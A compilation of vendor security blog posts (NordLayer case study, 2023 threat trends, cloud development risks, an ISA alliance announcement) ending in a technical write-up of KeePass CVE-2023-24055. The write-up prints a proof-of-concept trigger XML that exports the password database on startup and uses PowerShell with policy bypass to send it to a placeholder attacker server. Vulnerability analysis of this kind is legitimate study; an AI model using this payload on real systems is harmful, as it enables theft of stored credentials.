How Board of Innovation manages security to protect its teamwork & client data

Board of Innovation is a global innovation firm imagining tomorrow’s products, services, and businesses – and creating them today. The company joins forces with the world’s most ambitious businesses to make what life needs next.

Working with prospects and new ideas requires creative flexibility that the company initially doesn’t want to block with security restrictions and limitations. On the other hand, protecting business and client data remains one of the company’s top priorities. Hence, Mehdi Lahmamsi Pinel, Global Operations & IT Manager at Board of Innovation tells how juggling those equally important things in the context of cyber threats aligns with the right security approach.

The challenge

Trust over control within client confidentiality

The company culture at Board of Innovation is based on trust and employee enablement. These are critical elements for a creative industry. To succeed, the company is remote-first, and collaboration with freelancers and consultants of different backgrounds supplements full-time employees to generate new-of-the-kind products and services.

“Board of Innovation team is diverse as we have around 100 people of about 30 different nationalities in 60 places varying in cities, countries, and continents.”

Click to tweet

Yet, with a dynamic network of company innovators, consultants who move to client facilities, and third-party partners, IT managers face many challenges maintaining high levels of security that don’t interfere with team workflow.

“Business with client companies makes data security and confidentiality imperative, balancing it with the IT Manager’s responsibility to ensure the team works efficiently and effectively.”

Click to tweet

Board of Innovation works with high-profile companies and industry leaders. High traffic of changing projects, collaborators, and partners also requires precise supervision to mitigate the risks.

Since employees are unrestricted with their choices of how they want to work, self-awareness of the entire organization must be on board to achieve security goals. But how does one define the proper data protection standards and make security implicit yet not dominant? It’s a tough and subtle challenge for the IT manager to tackle.

The solution

Depicting minimums of must-security

With evaluation of team setup, work environments, and the need for flexibility, a VPN solution was the most straightforward tool for Board of Innovation. It enables many different security protocols defined in the company. One of the policies is establishing a safe connection to the company network — this is where NordLayer comes into play.

A newly assigned IT manager started by reviewing the then-current cybersecurity strategy applied in the organization. Deployed by the previous responsible manager, Board of Innovation already had an ongoing NordLayer subscription. Yet, it needed a strategy that fits company culture to its benefit.

“I’ve started by revisiting and improving the existing cybersecurity setup. NordLayer was there but not utilized to its fullest potential.”

Click to tweet

So what needed to be added to create a sound cybersecurity strategy that works?

The company has a secure network access solution in place. VPN is a mandatory factor of encrypted connection, and every organization member has to familiarize themselves and agree to data protection policies.

“Whether our collaborators and employees use personal or corporate devices for the job, they must acknowledge internal IT security policies to follow.”

Click to tweet

Board of Innovation follows a streamlined approach to managing its workforce — company policies define access levels to internal data. To put policies into force, corporate devices became a connecting point for every user with access to company resources.

“Mandatory apps like NordLayer and tools for password management, specific internet navigation, and work organization are pre-installed by default. That’s how we enforce security via device management on corporate devices.”

Click to tweet

Having the tools that fulfill internal and client data security requirements relieves the security manager from dependency on employees. And having those corporate devices set up and readily distributed to the hands of the workforce is half the job done.

Users have to launch VPN once connecting to untrusted networks wherever and whenever they work, and the admin can supervise the whole process if the rules are followed.

Why choose NordLayer

Creative freedom and trust are the foundation of the Board of Innovation culture. Thus, any tools and solutions used to keep up with the security requirements must be convenient and simple, enabling and not disrupting the workers.

The organization decided to keep the NordLayer solution due to its user-friendliness. Moreover, the well-known service provider has to sustain being a reputable vendor of a safe and efficient solution.

Role and endpoint management leaves more space for protecting digital company assets by enforcing authenticated user identities. More granular network access segmentation enables careful supervision over the organization members.

How NordLayer enables data security on different network layers

Systems and policies allow the IT manager to achieve consistency in business processes and operations. Having an overview on the NordLayer dashboard makes it easier to see who complies with the rules, like having the 2FA enabled. Moreover, or get a report of the connection history.

The outcome

Streamlined consistency aligned with internal policies

Now, Board of Innovation has all workforce onboarded to the NordLayer solution. The solution present in every corporate device and combined with two-factor authentication makes it easier for the IT manager to ensure policies are up and running.

“We distribute NordLayer licenses to all organization members and contributors as a basic rule in our company. We aim to reinforce security policies in as many places as possible.”

Click to tweet

The remote network access solution enables the organization to collaborate with various clients, partners, and freelancers. Managing access to internal resources and project information creates barriers to stopping data leaks and breaches. And importantly, security policies don’t overcome and interrupt innovators’ creativity and workflow.

“Using NordLayer is so easy — simply open the user interface, choose a gateway, get connected, and here you go.”

Click to tweet

All that is left for the IT manager is to distribute access and privileges to internal resources according to the company policies and check that everyone is on board with the process.

Pro cybersecurity tips

Sharing best practices is what helps businesses of any industry innovate in their own way of security. Creating a strategy for protecting the company network and securing information of different levels can be based on the most unconventional and unexpected advice. Thus, this time just like every time, we asked Mehdi Lahmamsi Pinel, the Global Operations & IT Manager at Board of Innovation, to share his professional insights on business cybersecurity:

Have you ever hesitated to impose security policies because they might overcrowd business operations and disrupt employees’ daily work? Creative freedom and simplicity can remain a priority since cybersecurity doesn’t have to become dominant yet effective and efficient.

NordLayer solution secures and enables every way of working, even if you want to prioritize trust and flexibility. The application, running in the background, simply does its job encrypting connections and segmenting the teams wherever the employees are. They can combine organization-provided devices with personal endpoints securely enabling BYOD policy within the company and IT managers can attend to their work stress-free. Sounds good? Reach out to learn more about NordLayer possibilities.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Top cybersecurity trends to be on the lookout for in 2023

Much like seasonal flu, cyber threats are constantly evolving every year. While the coronavirus curve has been, for the most part, flattened and more enterprises opened up their offices for on-premise employees, the number of cyberattacks continues to grow. Even last year, cyberattacks increased by 38% in 2022, compared to 2021.

Even without covid as a catalyst, businesses are still becoming more digital, leading to increased attacks. In this environment, cybersecurity is a real challenge, and both business managers and network administrators have a real head-scratcher on their hands. Here are our predictions on the cybersecurity trends for this year.

Cybersecurity trends for 2023

Cybersecurity is no longer an IT manager’s concern. It’s something that comes into play when making key business decisions. Data breaches can turn the business upside down with penalties and loss of customer trust. It’s a challenge that can come from outside and inside with improperly configured networks.

As digital transformation is becoming more prevalent among businesses, so does the increase of various threats. Here are the eight main cybersecurity trends shaping this year’s digital environment.

Top cybersecurity trends for 2023 blog visual web 1400x843 Chat GPT-enforced attacks

Soon after OpenAI launched the intelligent chatbot ChatGPT, it was quickly revealed that it could do more than just form responses across many knowledge domains. Cybercriminals have already started to use this tool for building hacking tools, while scammers are gathering knowledge to build similar chatbots to use for impersonation.

While the publicly available ChatGPT-coded tools are quite rudimentary, it seems that it’s only a matter of time before hackers can turn the AI to their advantage. In general, the least of its contributions is that it lowers the entry threshold by being a huge help for novice malware developers. Even without coding assistance, it helps to write genuine-sounding phishing emails for hackers.

Although ChatGPT has various safeguards to prevent it from being used for exploitation, this is something that businesses should keep in mind. Artificial intelligence is going mainstream which levels the playing field for hackers and can put increased pressure on your cybersecurity plan.

Remote and hybrid employees risks

After the pandemic, businesses have settled with hybrid workforce models. In some cases, these models are relics of a period when the Covid-19 outbreak forced the digital transition. As this development had to happen very quickly and not interrupt business operations, this also meant that the security measures weren’t always without gaps.

This blend of employees working on-premises, remote working contractors, and a wide variety of their used company-issued and personal devices makes it a colossal job to secure everything. For IT administrators, the attack surface is too huge to oversee everything that is happening. As data breach cases pile up, we’ll likely continue to see an increased interest in securing business networks and balancing them with workplace flexibility.

Automation of cybersecurity

As hackers themselves are starting to leverage AI for their exploits, it’s only natural that businesses should keep up. Data sources multiply exponentially, so automation is necessary to crunch numbers before humans can analyze them. This allows companies to get the best of both worlds and dramatically improve their cybersecurity status.

Various sources show that successful AI pairings can extend network visibility by up to 35%. These developments clearly show that AI has the potential to be a key component when transforming network security operations. Leveraging machine learning moves organizations forward and builds more sophisticated systems to withstand the most complex online threats.

International state-sponsored attacks

While state-sanctioned cyberattacks are nothing new, the ongoing war in Ukraine marked a turning point for a steep increase. Russia remains largely isolated from the rest of the Western world, and 64% of Russian hacking was directed directly at Ukraine. These are huge numbers, even without factoring in hacking attempts at their allies. Cyber espionage is escalating in other areas as the US recently shot down the Chinese surveillance balloon.

As all this is happening, a business can easily be caught in the crossfire. This makes private companies and critical infrastructure organizations prime targets for credential theft, vulnerability exploitation, or ransomware. In such a climate, not having a cybersecurity plan in place is a severe liability, and businesses will likely take action to address IT security shortcomings.

Building a security-aware culture

According to Verizon, 85% of breaches involve a human element, so investing in cybersecurity technologies but skimping on the workforce is missing the forest for the trees. In today’s climate, thinking that cybersecurity risks are a problem for the IT department can blow up when you least expect it. Every single employee must be aware of potential cyber risks and know how to deal with them.

In some cases, this may require building transparent information security policies. In others, security awareness training may be necessary. Security culture building will become a key factor in many organizations this year. As social engineering attack numbers aren’t subsiding, there’s no other way to combat these threats than through company culture.

Data breaches will continue to increase

Data breaches increase yearly more than they did the previous year, and this year will be no exception. Data is still one of the most valuable assets, and organizations still leave plenty of room for attackers to exploit gaps in the fence. Building a firm infrastructure isn’t cheap or simple, either, so most companies exist hoping they won’t be the next target.

This said prevention is much more effective (and cheaper) than settlements, lawsuits, and fines for data security violations. Yet, many businesses still rely on legacy software without any risk management policy and procedure updates. We can expect that more businesses will be caught off guard this year while others will try to learn from others’ mistakes rather than their own.

Global recession serves as a catalyst for hackers

As many experts are warning about economic downturns, this can catalyze cybercrime. Most cyberattacks are financially backed, so as the economy shrinks due to global geopolitical events like Russia’s war in Ukraine, this sends a shockwave throughout all spheres of life. Hacking, therefore, can become a lucrative option if a person has the skills and no other options to earn a living wage.

Hackers-for-hire, therefore, may emerge in search of easy money, which can have various devastating consequences for companies. While some might perform penetration tests or collect bug bounties, others may not be so ethical. This should be considered, especially in Europe, considering its geopolitical tensions.

Credential stealing will continue to rise

Various reports show that mobile device vulnerabilities targeting credentials are on the rise. Hackers know that employees use their IoT devices to access the company network. So these devices are user-managed. They tend to have quite more vulnerabilities that hackers could exploit.

What also helps hackers is that most systems are still protected with only passwords. It’s especially easy to crack such a setup when employees reuse the same passwords. A move towards passwordless or hardware identity tokens is happening slowly. This proves to be a lucrative opportunity for thieves. Some experts claim that we’ll also see more second-factor authentication exploits via SMS and push-based multi-factor authentication solutions this year.

Tips on how to prepare your business for 2023

To prepare for this year, companies should start with budgeting. The amount spent on cybersecurity in 2021 and 2022 should be a benchmark for the 2023 budget. It should also adjust according to how many significant changes occurred in the organization and the cybersecurity landscape.

Adjusting the cybersecurity budget according to your company size is also common. A rule of thumb is to allocate at least 10-20% of your total budget. Revising the budgeting plan as you go is always a good idea. Cybersecurity threats and landscape can change a lot throughout the year, so staying flexible is one of the methods to stay ahead of the curve.

How can NordLayer help to protect your business in 2023?

Most recent developments in cyberspace are relevant to every business as most of them will be affected by them. Organizations need trustworthy allies to deter cyber threats as the threats keep piling up.

A modern remote network access solution like NordLayer is developed to integrate threat, network, and security management centrally to provide an explicit range of issue-targeted features. Especially with the help of a convenient design that combines cloud-based platforms, data privacy protection, and access control security strategies.

NordLayer covers security with a centralized control interface and product integration to existing infrastructure. It provides secure remote access solutions for hybrid environments and implements zero trust for distributed workforces conveying everything to the cloud environment.

Achieve a multilayered security protection network and data environment — secure your business in 2023 with NordLayer — reach out to talk more.

About Version 2 Digital

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

Nord Security 2023 NordLayer

Software development in the cloud: benefits & challenges

Digital transformation touched most businesses operating today, and the transition to the cloud is an important step. The cloud became a primary environment for creating new software, particularly for software developers and IT professionals. Combining flexibility and efficiency for the price served as the new way of doing business.

Yet, not everything was all moonlight and roses — the outsourced model also brings a fair share of cybersecurity risks. This creates a head-scratcher for network administrators and developers in balancing the benefits with the risks to ensure a streamlined mode of operation that is as effective as it’s secure. Let’s take a deep dive into all things cloud software development.

What is cloud computing?

Cloud computing is an infrastructure model in which resources and processes are outsourced to data centers rather than done internally. This method relies on the public internet as the primary mode of delivery, allowing a much wider reach than possible using conventional methods.

Cloud computing often provides services like data storage, management, device access, networking, and cybersecurity. Externalizing these operations to cloud-based infrastructure allows businesses to focus their efforts elsewhere. In addition, this also enables them to flexibly adjust their operations according to their needs allowing them to be changed at a moment’s notice. It’s a key driving force behind the startup culture and innovations.

Service models

Reliable, fast, and secure services are what every customer takes as a baseline. Businesses are pressed to deliver on the highest level at all times. However, IT infrastructures can’t always stretch that fast, nor can every business owner issue blank checks for upgrades.

Cloud computing solves these pressing issues by providing a streamlined model delivered via the internet. According to specific business requirements, cloud computing services are classified into three distinct models.

Software as a Service (SaaS)

SaaS is primarily used for the delivery of web applications. Fully managed by the service provider, cloud software is accessed remotely and typically has pricing based on plans and subscriptions. In most cases, this provides a much cheaper solution that manages software internally and relieves the teams from the need to perform maintenance.

Platform as a Service (PaaS)

PaaS offers a remotely accessible environment allowing developers to build and deliver software applications. This bypasses the need to use Integrated Development Environments, which are expensive and difficult to set up and maintain. The model includes everything you’d need to start working on your applications, like various middleware tools and operating systems. PaaS uses the same pay-as-you-go model as other remaining cloud service models.

Infrastructure as a Service (IaaS)

IaaS offers core cloud computing services like servers, storage, and networking on demand. This type helps a company to adjust company resources on demand. In cases when new applications have launched, this type also helps to quickly provision them and extend the reliability of existing infrastructure. Usually, payment costs are collected based on using a particular resource, allowing you to install and manage your software on top.

Cloud deployment models

The cloud services deployment model may also have various distinct particularities like ownership, scale, access rights, etc. It defines the location of the servers your organization will be using, what can be changed, and the needed input from the client. This distinguishes different cloud deployment types.

Public cloud

As you can probably guess from the name, the public cloud is available for everyone to access. It’s provided for the general population, making it the least secure cloud type. Owned and managed by the cloud services provider, this type doesn’t require much maintenance but is also the most difficult to secure. On other hand, some public clouds are free to use, while some require a subscription to move beyond the basic plan.

Private cloud

The polar opposite of the public cloud is a private type — it’s reserved for a single user using separate hardware. Often incorporated into the organization’s infrastructure, the private cloud facilitates handling all the hardware and software services within its perimeter. It offers the most flexibility of all the cloud service types allowing an organization to customize even the tiniest aspects of the setup.

Hybrid cloud

Hybrid combines the best private and public cloud features using proprietary software. This allows hosting applications in a safe environment and cheaper service due to reliance on the public internet. In a way, this functions like a partially locked public cloud with much more customization options.

Benefits of software development in the cloud

If your business rapidly expands, cloud technology is a natural addition to improving your operations. This allows you simultaneously to improve productivity and give more opportunities for your internal teams. Here is a list of the principal benefits related to cloud computing.

1. Scalability

Traditional server hosting always met various constraints as it was based on physical hardware — the capacity can only be proportional to your internal server stack. Cloud computing turns this premise on its head, removing all constraints. No matter the organization’s size or budget, it’s possible to find an option to fit any budget.

When a bigger capacity is needed, allocating more servers to combine their processing power is easy. Various server service providers also offer flexible memory or CPU adjustments, so it’s possible to customize the cloud computing setup to the smallest details.

2. Cost-efficiency

For businesses looking for various entry points to test the waters before committing to a full-scale infrastructure, the cloud computing model’s cost efficiency is the key benefit. Unlike hosting everything internally, cloud doesn’t need any upfront investments, making it a perfect starting spot to increase usage, on a need basis.

Pricing-wise, cloud service providers widely adopt pay-per-usage fees, meaning that organizations are only charged for the resources they use. This means it’s much more convenient to manage overspending and provides a safety net if the operations need to be quickly shrunk.

3. Disaster recovery and redundancy

No matter which method for application and data hosting a business chooses, emergency data recovery methods will have to be set up. Admittedly, cloud services should be much easier as they come out of the box with easy data mirroring and backup solutions.

Traditional on-premise setups will have to be configured from the ground up, meaning that additional investments are very likely. Setting the mirroring within the internal perimeter doesn’t help in case the whole network becomes infected. This could potentially damage the backup as well. This is one of the biggest advantages of cloud computing.

4. Fast provisioning of resources

Relying only on the currently available on-premises leaves companies with only a few resources. Various software development and test environments require thorough planning in advance and take a while to get running. However, with the cloud model, everything can be available instantly.

Brand-new environments for testing or development purposes can be created instantly. This can speed up cloud software development by skipping preparation steps and getting the work environment ready instantly. The cloud provider periodically introduces new adjustments, ensuring that the prepared application seamlessly integrates into the new technological landscapes.

5. Multiple models and offerings

The cloud model is less restrictive and doesn’t operate in one-size-fits-all absolutes. By design, it’s flexible and aims to adapt to accommodate the organization’s needs, not the other way around.

On average, each provider has at least several options to choose from, while most will allow even greater personalization for an extra fee. As it was mentioned previously, various internal and outsourced cloud infrastructure models can be combined to develop a hybrid approach if that’s the direction in which a business wants to progress.

6. Wide geographic reach

Unlike on-premises hardware, cloud-based infrastructures have a much wider reach. This can be helpful when connecting your globally distributed workforce and reaching your customers. The latter could be improved by optimizing the server load by leveraging cloud architecture.

Even if an application is hosted in a single location, a distributed cloud model allows users to easily access it through multiple points of presence scattered around the globe. This is further facilitated by content delivery networks allowing instant access to various resources and services.

7. Easy deployment

The innate flexibility of cloud infrastructures brings easy deployment capabilities. In practice, some operations could be automated by integrating various cloud processes into your existing setup. This could significantly speed up the application testing process.

Simultaneously this allows a business to ramp up the cloud software development speed allowing instant updates in testing environments. If everything works well, the slots could be easily swapped to go into production. This works wonders for testing new features and ensuring new upgrades work as intended before releasing them to the public.

Possible challenges of cloud software development

While it opens many doors of possibilities, cloud software development isn’t without its fair share of challenges. Outsourcing can be difficult, especially for companies with a functioning system. Here are the major challenges that face cloud application software development.

Seamless interoperability

The major challenge facing organizations that are considering cloud frameworks is interoperability. The written code needs to work with multiple cloud providers despite their differences. This even gets more complex when portability is involved. The same code might be difficult to transfer from one environment to another.

This needs to be addressed by introducing standards and facilitating data access across different software platforms. For this reason, operating protocols must be highly standardized to avoid potential interoperability errors.

Performance issues

When we’re talking about the cloud, we’re talking about distributed physical servers. This still means that their physical location is important, and customer connection to them could impact their experience.

Therefore it’s important to prepare in advance and figure out which data centers will be hosting your data. It will be much easier to set everything up correctly in advance rather than to plan the move once the operations are up and running. End-to-end testing is critical. Cutting corners will result in an inefficient mechanism that hurts your company in the long run.

False promises of scalability

While it is true that all cloud computing providers can provide scalability, this still has the constraints of the provider’s capacity. Scalability is always limited to the number of resources a provider has, so if your scaling needs are beyond what the provider can deliver, you may be stuck with a service that doesn’t cover your needs.

The key risk here is choosing a predefined program that isn’t as flexible or adjusted to your needs. In some cases sticking with a hybrid model allows for the best solutions from the best worlds.

Reliability and availability

While the cloud model helps to maintain high uptime for cloud apps, this isn’t always a guarantee. Cloud providers rarely offer around-the-clock service, so outages could be left unresolved. Similarly, the provider might not inform leniently about maintenance schedules or other problems.

This requires additional effort on the client’s part. The used cloud service should be monitored using additional tools. Things like service usage and performance should be something that an organization knows at all times.

Dependency on the provider

When building applications, it is very convenient to tailor-make the code to work best within its cloud environment. However, this also has the side-effect of becoming heavily reliant on the external partner for your operations. Sometimes, changing the provider might be expensive, time-consuming, or difficult from a technical standpoint.

Your services should follow good architecture practices to avoid being tangled with underlying service logic if a business decides to move operations elsewhere. For developers, this means understanding different protocol particularities and responsibly adjusting application behavior.

Programming modes

Developing applications in the cloud require different programming skills. While most developers are familiar with SQL operations passing application-specific functions aligned with federated data sources, cloud software developments don’t work the same way. This requires developers to adopt query-oriented processing to derive federated data sets performing complex queries or function compositions that align better with cloud computing models.

Application security

Outsourcing such critical elements as application software development means their access should be heavily restricted. This makes application security a challenge due to the web delivery model and the state of the browsers.

For this reason, the connection outside the browser must be properly secured using encryption and tunneling protocols. Still, it’s a broad topic that could be addressed separately.

What measures should developers take to secure software in the cloud?

Transferring developing workflows in the cloud is one of the most important moves that a company could make. While it provides various benefits for developers, security is one of the most important concerns related to it. Here’s how it could be improved.

1. Establish governance policies

Clearly defined governance policies help to achieve better security in cloud software development operations. They put procedures and policies in place and give employees clear guidance in the workplace.

When aligned with your company’s internal security requirements, these policies create a holistic system defining organization-wide operational standards. This even out security across the board, creating transparent processes.

2. Segment your network

An architectural approach of dividing networks into smaller segments helps to manage various security risks in case of a data breach. As free lateral movement across the network is restricted, hackers are isolated within a subnet limiting the pace and time during which they could undetected could stage an attack.

Resources can be shared between segments, so no additional processing power is needed. In addition, this approach helps from the security standpoint and allows control of traffic flow between subnets based on granular policies.

3. Automate security processes

Security automation is an essential component of a solid cloud software development operations model. Code analysis could be automated during the building and testing phases. Meanwhile, infrastructure as code practices can automate configuration management. Finally, various potential threats could be instantly responded to without human intervention preventing potential damage.

4. Conduct vulnerability management

Identification, evaluation, and security vulnerability reporting is a critical procedure that is paramount to secure cloud software development. Applications should be provided to the customer if they have unresolved known vulnerabilities. Otherwise, hackers could easily exploit them. Penetration testing mechanisms are therefore needed to assess potential exploits better and address critical application shortcomings.

5. Regularly audit security

Organizations’ security practices should match their policies. If the two don’t align, this catalyzes a cybersecurity incident. Periodic evaluations of security practices should be one of the cybersecurity strategy pillars. Various improvements should also be considered helping to set benchmarks and progress measurements.

How NordLayer can help secure the cloud

As the cloud-first approach is a firmly established infrastructure organization method among modern businesses, its security is one of the most important disciplines of modern cybersecurity. Application software development relies heavily on cloud computing to make the heavy lifting possible, but this must always be secure.

NordLayer offers cloud-native tools incorporating ZTNA practices within a Secure Service Edge model. Allowing secure remote access by encrypting traffic from end to end can protect data, whether it’s hosted locally or on the cloud.

Features like IP allowlisting enable network administrators to approve authenticated connections and block everything else. This helps to create an airtight system that provides a secure access model when using external cloud services.

Get in touch with the NordLayer team and explore our cloud-based products today.

About Version 2 Digital

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

Nord Security 2023 NordLayer

senhasegura’s participation in the ISA Global Cybersecurity Alliance

The topic of cyber threats is becoming increasingly present on the agendas of organizations of all sizes and verticals. With the intensification of the digital transformation movement through the introduction of technologies such as 5G and the Internet of Things, ensuring the protection of infrastructure will be an even greater challenge for organizational leaders.

One of the preferred targets of malicious attackers are organizations that use Industrial Control Systems (ICS). ICS processes critical data and is responsible for the functioning of sectors such as telecommunications, logistics, energy generation, and the healthcare sector. These sectors are a vital part of countries’ economies, forming part of what we call critical infrastructure. According to a Kaspersky study, during the second half of 2021, almost 40% of industrial devices were targeted at least once. These attacks bring significant consequences not only for these organizations but for society as a whole.

One of the biggest examples of the damage that attacks on this type of organization bring occurred in 2017. That year, Maersk, a logistics giant, fell victim to the NotPetya malware, a virus with high propagation and destruction capacity that encrypted its data. The attack caused infected devices to simply stop working, affecting the continuity of its operations and bringing revenue losses.

In addition, various governments around the world have shown concern about the impact associated with cybersecurity, especially those linked to critical infrastructure. This has caused an increase in the activity of regulating how companies implement appropriate cybersecurity controls in industrial environments.

As part of the effort to ensure the cybersecurity of control and automation systems, the International Society of Automation (ISA) developed the 62443 series of standards. These standards are internationally recognized and have been adopted by the International Electrotechnical Commission and the United Nations. The ISA 62443 standards define requirements and procedures for the implementation of safe industrial and automation systems, as well as best security practices for these systems. The adoption of the ISA 62443 standards allows industrial organizations to address the challenges related to the cybersecurity of their systems and eliminate the gaps between operations and Information Technology in their infrastructure.

Moreover, with the aim of increasing awareness and protection capability of ICS in industrial and critical infrastructure installations and processes, ISA created the Global Cybersecurity Alliance (GCA). The cybersecurity alliance created by ISA brings together automation and system control providers, IT infrastructure suppliers, service providers, system integrators, and end-users to address threats to ICS together.

ISAGCA also works to stimulate the adoption of the ISA 62443 standards, which allows for increased awareness, knowledge sharing, and tool development to assist organizations in implementing the entire cybersecurity protection lifecycle. ISAGCA members are also committed to working together with government agencies, regulators, and other stakeholders around the world.

ISAGCA members include leading technology and industrial application providers, among which is Senhasegura. senhasegura’s participation in ISAGCA since its foundation allows for the application of our experience in protecting privileged access to achieve the alliance’s objectives, especially those related to ICS protection. senhasegura’s participation in the alliance also allows for identifying gaps, reducing risks, and ensuring that member companies have the appropriate tools to protect their infrastructure from malicious attacks.

All of these aspects also show the commitment of the entire senhasegura team and ISA to the effective security of industrial environments, as well as the importance of advancing together to ensure the application of these standards, methods, and best practices for the protection of industrial systems. In this way, it is possible to ensure not only the security of organizations but of society as a whole.

About Version 2 Digital

About Segura®
Segura® strive to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Segura 2023

KeePass Passwords Theft CVE-2023-240550

Introduction

CVE-2023-24055 is a vulnerability discovered in KeePass version 2.53 The vulnerability allows an attacker with write access to the XML configuration file on a system to steal vault credentials. KeePass is widely used as a free open-source password manager that stores sensitive information locally ,providing some advantages over cloud-based options and making it user-friendly

Set Up The Environment

Go to install KeePass v2.53 from this archive site with the default configuration installation and create a database_file and set the master_key to be ready as in the following picture.
For the attacker machine, I recommend using Kali Linux, which can be downloaded from the official website at kali. In this scenario, the victim machine will be running Windows 10. We will use also tools like Burp Suite as an HTTP proxy to inspect the traffic.

Dynamic Analysis

Based on this PoC the attack vector was through the configuration file located at C:\Program Files\KeePass Password Safe 2\KeePass.config.xml , using the Trigger feature

To explore this feature, let’s take a look at the options toolbar in the KeePass application.

Navigate to Tools > Triggers...

as shown in the following Picture:

The interesting thing here is that Triggers are enabled by default in KeePass, and there is an ‘Initially on’ option that causes the trigger to run every time KeePass starts. This gives an attacker an advantage in running the trigger without enabling it and are more customizable options available such as Event, Condition, and Action

By looking at each option in more detail, I realize that there were numerous options that could be used for malicious purposes, such as the Application started and ready feature. Attackers could exploit this option by using it as an event to trick victims into opening the application and initiating the trigger feature to export data and carry out malicious activities

and The Action option is used to perform specific tasks based on the specified Conditions and Events. These tasks can include executing command lines or URLs and exporting the active database, which can be risky for the user. An attacker can use these options to perform malicious actions, as demonstrated in the PoC

Static Analysis

The app was developed in C# it’s easy to reverse the code but we don’t need it cuz it’s open-source we have all we need in this repo :”

The vulnerability which is password theft in the code is caused by the app’s default policy that doesn’t require the user to enter their master key every time they export their password database. This behavior can be controlled through the app policy, which is located in the ExportUtil.cs file.

by the following code:

public static bool Export(PwExportInfo pwExportInfo, FileFormatProvider fileFormat,
			IOConnectionInfo iocOutput, IStatusLogger slLogger)
		{
			if(pwExportInfo == null) throw new ArgumentNullException("pwExportInfo");
			if(pwExportInfo.DataGroup == null) throw new ArgumentException();
			if(fileFormat == null) throw new ArgumentNullException("fileFormat");

			bool bFileReq = fileFormat.RequiresFile;
			if(bFileReq && (iocOutput == null))
				throw new ArgumentNullException("iocOutput");
			if(bFileReq && (iocOutput.Path.Length == 0))
				throw new ArgumentException();

			PwDatabase pd = pwExportInfo.ContextDatabase;
			Debug.Assert(pd != null);

			if(!AppPolicy.Try(AppPolicyId.Export)) return false;
			if(!AppPolicy.Current.ExportNoKey && (pd != null))
			{
				if(!KeyUtil.ReAskKey(pd, true)) return false;
			}

Simply the Export method in the code ensures that all required parameters are present and valid, and checks the application policy to ensure that exporting data is allowed. If a master key is required for the export process, it prompts the user to enter the master_key . The application policy includes rules such as Export -No Key Repeat, which dictate how the export process should be handled and more as

shows in this picture :

KeePass has two types of configuration files that are managed by the file AppConfigSerializer.cs. This file loads and saves the configuration, and it includes two types of files: enforced configuration files and user-specific configuration files.

note this code have a lot of lines so i will focus my analysis on the two methods most relevant to the CVE which is LoadFromEnforcedConfig(),LoadUserConfiguration()

The LoadFromEnforcedConfig() method reads configuration settings from an enforced_config.xml file, which overrides any user-configured settings. It’s useful for enforcing global settings, like security policies, across multiple instances of KeePass.

On the other hand, the LoadUserConfiguration() method reads user-specific settings from the KeePass.config.xml file. This file allows users to customize KeePass according to their preferences, and it overrides default settings in the sample configuration file.

The enforced configuration file and user-specific configuration file serve different purposes. The enforced configuration file is useful for enforcing global settings, while the user-specific configuration file is helpful for customizing individual user settings.

so by analyzing KeePass flow for vulnerabilities, the user-specific configuration file can be a potential attack vector because it’s user-controlled and can be manipulated to inject malicious code like the following code below in Proof-Of-Concept

In contrast, the enforced configuration file is less vulnerable to attacks since it’s not user-configurable because it’s managed by the system or administrator,.

and in order to use the trigger feature in KeePass through the Application GUI, it is required to enter the master_key while opening the application, if the code is injected into the config file, it is unnecessary to enter the master_key because the trigger will be updated from the config file when the victim opens the application. As shown in the PoC, anyone with write access to the config file can potentially add triggers like the following to exfiltrate the database passwords.

<Triggers>
	<Trigger>
		<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
		<Name>exploit</Name>
		<Events>
			<Event>
				<TypeGuid>2PMe6cxpSBuJxfzi6ktqlw==</TypeGuid> 
				<Parameters>
					<Parameter>0</Parameter>
					<Parameter />
				</Parameters>
			</Event>
		</Events>
		<Conditions />
		<Actions>
			<Action>
				<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
				<Parameters>
					<Parameter>C:\Users\STAR TOP\Desktop\exploit.xml</Parameter>
					<Parameter>KeePass XML (2.x)</Parameter>
					<Parameter />
					<Parameter />
				</Parameters>
			</Action>
			<Action>
				<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
				<Parameters>
					<Parameter>PowerShell.exe</Parameter>
					<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
					<Parameter>False</Parameter>
					<Parameter>1</Parameter>
					<Parameter />
				</Parameters>
			</Action>
		</Actions>
	</Trigger>
</Triggers>

During the code analysis, we identified the presence of a globally unique identifier (GUID) under the <Trigger> parameter. This GUID is utilized to identify values, including byte arrays and base64 encoded strings such as lztpSRd56EuYtwwqntH7TQ==, and it is also used to reference the trigger function name exploit.

The second parameter is the TypeGuid , which is another globally unique identifier 2PMe6cxpSBuJxfzi6ktqlw== and that refers to the Application started and ready option in the event part.

and the third parameter that containing D5prW87VRr65NO2xP5RIIg== is used for exporting the active database and selecting the file format as KeePass XML (2.x), and well as setting the file path

then code then uses powershell.exe by referencing the `TypeGuid` which is 2uX4OwcwTBOe7y66y27kxw== to execute a command that performs the exfiltration which means unauthorized copying or transmission of database or important data to the attacker’s server.

by performing the following commands

-ex bypass to bypass the PowerShell execution policy, -c to execute the Invoke-WebRequest cmdlet, which allows sending HTTP/HTTPS requests. -uri to specify the URL of the attacker’s server to receive the encoded data.

